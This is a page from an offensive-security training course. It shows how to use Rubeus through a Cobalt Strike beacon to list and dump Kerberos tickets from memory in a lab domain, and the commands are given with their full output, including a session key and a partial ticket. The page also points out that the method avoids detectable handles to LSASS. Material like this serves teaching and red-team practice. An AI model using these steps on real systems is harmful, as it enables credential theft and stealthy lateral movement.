Extracting Kerberos Tickets

One unfortunate consequence of the aforementioned techniques is that they obtain handles to sensitive resources, which can be audited and logged quite easily. Rubeus is a C# tool designed for Kerberos interaction and abuses, using legitimate Windows APIs.

Its triage command will list all the Kerberos tickets in your current logon session and if elevated, from all logon sessions on the machine.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage

Action: Triage Kerberos Tickets (All Users)

[*] Current LUID    : 0x14b5fa

 ----------------------------------------------------------------------------------------------------------------- 
 | LUID     | UserName                     | Service                                       | EndTime             |
 ----------------------------------------------------------------------------------------------------------------- 
 | 0x14bf5e | bfarmer @ DEV.CYBERBOTIC.IO  | krbtgt/DEV.CYBERBOTIC.IO                      | 9/1/2022 6:10:14 PM |
 | 0x14bf5e | bfarmer @ DEV.CYBERBOTIC.IO  | LDAP/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 6:10:14 PM |
 | 0x14bf5e | bfarmer @ DEV.CYBERBOTIC.IO  | HTTP/squid.dev.cyberbotic.io                  | 9/1/2022 6:10:14 PM |
 | 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO  | krbtgt/DEV.CYBERBOTIC.IO                      | 9/1/2022 6:10:07 PM |
 | 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO  | cifs/dc-2.dev.cyberbotic.io                   | 9/1/2022 6:10:07 PM |
 | 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO  | ldap/dc-2.dev.cyberbotic.io                   | 9/1/2022 6:10:07 PM |
 | 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO  | cifs/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 6:10:07 PM |
 | 0x14b5fa | bfarmer @ DEV.CYBERBOTIC.IO  | LDAP/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 6:10:07 PM |
 | 0x7049f  | jking @ DEV.CYBERBOTIC.IO    | krbtgt/DEV.CYBERBOTIC.IO                      | 9/1/2022 5:29:20 PM |
 | 0x3e4    | wkstn-2$ @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO                      | 9/1/2022 5:28:29 PM |
 | 0x3e4    | wkstn-2$ @ DEV.CYBERBOTIC.IO | HTTP/squid.dev.cyberbotic.io                  | 9/1/2022 5:28:29 PM |
 | 0x3e4    | wkstn-2$ @ DEV.CYBERBOTIC.IO | cifs/dc-2.dev.cyberbotic.io                   | 9/1/2022 5:28:29 PM |
 | 0x3e4    | wkstn-2$ @ DEV.CYBERBOTIC.IO | ldap/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
 | 0x3e7    | wkstn-2$ @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO                      | 9/1/2022 5:28:29 PM |
 | 0x3e7    | wkstn-2$ @ DEV.CYBERBOTIC.IO | HTTP/squid.dev.cyberbotic.io                  | 9/1/2022 5:28:29 PM |
 | 0x3e7    | wkstn-2$ @ DEV.CYBERBOTIC.IO | cifs/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
 | 0x3e7    | wkstn-2$ @ DEV.CYBERBOTIC.IO | WKSTN-2$                                      | 9/1/2022 5:28:29 PM |
 | 0x3e7    | wkstn-2$ @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io                   | 9/1/2022 5:28:29 PM |
 | 0x3e7    | wkstn-2$ @ DEV.CYBERBOTIC.IO | LDAP/dc-2.dev.cyberbotic.io/dev.cyberbotic.io | 9/1/2022 5:28:29 PM |
 | 0x3e7    | wkstn-2$ @ DEV.CYBERBOTIC.IO | wkstn-2$@DEV.CYBERBOTIC.IO                    | 9/1/2022 7:43:42 AM |
 -----------------------------------------------------------------------------------------------------------------

Each user has their own logon session, which is represented by a LUID (locally unique identifier). In this example, we're operating within the LUID of bfarmer, 0x14b5fa. The WKSN-2$ machine account has its own session, 0x3e4; and jking also has a session, 0x7049f. Tickets for the service name krbtgt are Ticket Granting Tickets (TGTs) and others are Ticket Granting Service Tickets (TGSs). The different ticket types are described in more detail in the Kerberos chapter.

Rubeus' dump command will extract these tickets from memory - but because it uses WinAPIs, it does not need to open suspicious handles to LSASS. If not elevated, we can only pull tickets from our own session. Without any further arguments, Rubeus will extract all tickets possible, but we can be more specific by using the /luid and /service parameters.

For example, if we only wanted the TGT for jking, we can do:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt

Action: Dump Kerberos Ticket Data (All Users)

[*] Target service  : krbtgt
[*] Target LUID     : 0x7049f
[*] Current LUID    : 0x14b5fa

  UserName                 : jking
  Domain                   : DEV
  LogonId                  : 0x754c2
  UserSID                  : S-1-5-21-569305411-121244042-2357301523-1105
  AuthenticationPackage    : Kerberos
  LogonType                : Batch
  LogonTime                : 10/13/2022 9:36:19 AM
  LogonServer              : DC-2
  LogonServerDNSDomain     : DEV.CYBERBOTIC.IO
  UserPrincipalName        : jking@cyberbotic.io


    ServiceName              :  krbtgt/DEV.CYBERBOTIC.IO
    ServiceRealm             :  DEV.CYBERBOTIC.IO
    UserName                 :  jking
    UserRealm                :  DEV.CYBERBOTIC.IO
    StartTime                :  10/13/2022 9:36:20 AM
    EndTime                  :  10/13/2022 7:36:20 PM
    RenewTill                :  10/20/2022 9:36:20 AM
    Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType                  :  aes256_cts_hmac_sha1
    Base64(key)              :  EIkrCAL8wx98PVRBOZGDKC6Y0KReSosWtvXyv6rIefI=
    Base64EncodedTicket   :

      doIFuj [...snip...] lDLklP

This will output the ticket(s) in base64 encoded format.

You may also add the /nowrap option which will format the base64 encoding onto a single line - this makes copy & pasting much easier.

PreviousDomain Cached Credentials NextDCSync

Last updated 2 years ago